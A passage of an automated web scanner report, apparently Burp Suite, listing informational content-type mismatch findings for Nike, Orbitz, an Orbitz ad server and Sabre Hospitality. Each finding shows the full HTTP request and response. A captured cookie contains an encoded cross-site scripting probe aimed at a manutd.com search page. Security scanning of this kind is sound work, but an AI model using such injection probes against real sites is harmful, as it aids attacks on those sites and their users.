User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-top-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 08 Sep 2011 17:34:10 GMT
ETag: "1b37-4ac7177eac880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6967
Content-Type: application/xml
Cache-Control: max-age=3012
Expires: Mon, 03 Oct 2011 00:53:01 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

<div id="panel">

   <div class="column">
   
       <div class="categoryButton" label="nikedotcom">
           <span id="text1">Nike</span>
           <span id="text2">.com</span>
           <a class="action" type="url" href=
...[SNIP]...
28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-top-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 25 May 2011 12:49:22 GMT
ETag: "134-4a4192236d880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 308
Content-Type: application/xml
Cache-Control: max-age=6375
Expires: Mon, 03 Oct 2011 01:49:04 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

...<div id="expand">
   <span id="en">More</span>
   <span id="fr">PLUS</span>
   <span id="de">MEHR</span>
   <span id="it">PI..</span>
   <span id="ja">MORE</span>
   <span id="ko">...</span>
   <span id="
...[SNIP]...
28.97. http://www.orbitz.com/cacheable/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /cacheable/empty.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "8-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:12 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:10:13 GMT
Age: 1441
Connection: keep-alive
Content-Length: 8

<!-- -->
28.98. http://www.revresda.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 10 Aug 2010 04:51:43 GMT
ETag: "57e-e3b535c0"
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/plain; charset=UTF-8
Cteonnt-Length: 1406
Server: Apache
Date: Mon, 03 Oct 2011 00:40:29 GMT
Age: 7073
Connection: keep-alive
Cache-Control: private
Content-Length: 1406

..............h.......(....... ................................2...V*...k..2...\....d..(...1............i..+................]..-.......a............}...l..f...n...'.......B........c......:...4....^..e
...[SNIP]...
28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aebaa22-24733-1570161280-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();
28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();
28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:12 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32

var adRotator = new adRotator();
28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1302538563-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1048
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1048
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...
28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...
28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-13167-437180534-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1068
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1068
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...
28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:26 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1106
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1106
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...
28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-19234-1962717445-8; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...
28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:26 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1124
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1124
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...
28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1123568220-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1077
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1077
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...
28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1115
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1115
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...
28.110. http://www.sabrehospitality.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
Accept: */*
